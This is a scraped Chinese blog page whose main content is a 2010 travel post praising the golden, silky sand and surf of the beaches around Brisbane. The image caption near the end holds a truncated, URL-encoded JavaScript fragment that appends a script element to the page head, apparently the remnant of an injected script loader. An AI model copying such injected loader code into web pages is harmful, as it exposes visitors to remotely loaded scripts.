登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

潇逸 百草苑

博客文章除注明外,都是原创之作,欢迎朋友浏览!博客头像是本人真照,请勿引用。

 
 
 

日志

 
 
关于我

一个褒贬不一的老实人,一个孝子却是个不称职的儿子,一个好男人却不是称职的丈夫,一个已为人父却又是一个不称职的爸爸,一个理科生却喜欢耍笔头无病也呻吟的人,一个取得一些成绩就沾沾自喜很容易满足的人。开博是为了怡情,记录自己人生旅途的足迹,从中寻找乐趣,也是让兴趣相同相近的网友分享我的喜与乐!

【原创】布里斯班的金色海滩  

2010-08-31 23:02:38|  分类: 旅游笔记 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

       澳大利亚昆士兰州的首府布里斯班是个滨海城市,有着很长的海岸线,是澳大利亚东北部的旅游渡假胜地和旅游休闲目的地,其中的黄金海岸是澳洲著名的海滩旅游休闲区。

      到达布里斯班的当天下午,我们就驱车直达市区的黄金海岸,去看看南半球的海,看看南方大陆的海滩与沙滩。布里斯班的海滩、沙滩风景确是很美,绵延数十里的海岸线,有许多段海岸、海滩都是柔软金色的沙滩和碧蓝碧蓝的海水。我们去游览的市区那一弯海岸沙滩,用“柔若丝绸”来形容,一点都不为过。说真的,这一处沙滩比我国南端的海口、三亚的各段海滩沙滩和北方的北戴河的滑沙滩还要洁静、还要细软和柔滑,踩在沙上,感觉特别柔滑。而在南部离市区70多公里的南边的那一段绵延数十里的一处海岸与沙滩,与我国的三亚市大东海有点相似,也是海浪涌来沙被淹、海水退去沙复还和海水碧蓝、风光秀美的海湾沙滩,所不同的是,这里的沙子的颜色却是金黄色的,海浪也险急。据说是难得的冲浪和滑水等水上运动的好地方,有“冲浪爱好者乐园”的美称。但由于是冬季,来旅游的人不多,加上海风很大,我里面穿着“金利来”底衫、衬衫外加外套也感到有阵阵冷意,没看到什么游客下海冲浪和弄潮,也没有看到游客在沙滩上垒沙,只看到一架动力伞在离海岸较远一些的海边上飞行一段行程又折回原处,不知是游客游览还是旅游区管理人员在例行巡查,可没有我国三亚大东海和海口西秀海滩的冬季游人还是那么热闹的场景,可能是我们来的不是休闲时令和黄金季节吧。

布里斯班的金海滩 - 潇逸 - 潇逸cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A"<                                                                                                                       潇  逸

  评论这张
 
阅读(346)| 评论(5)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018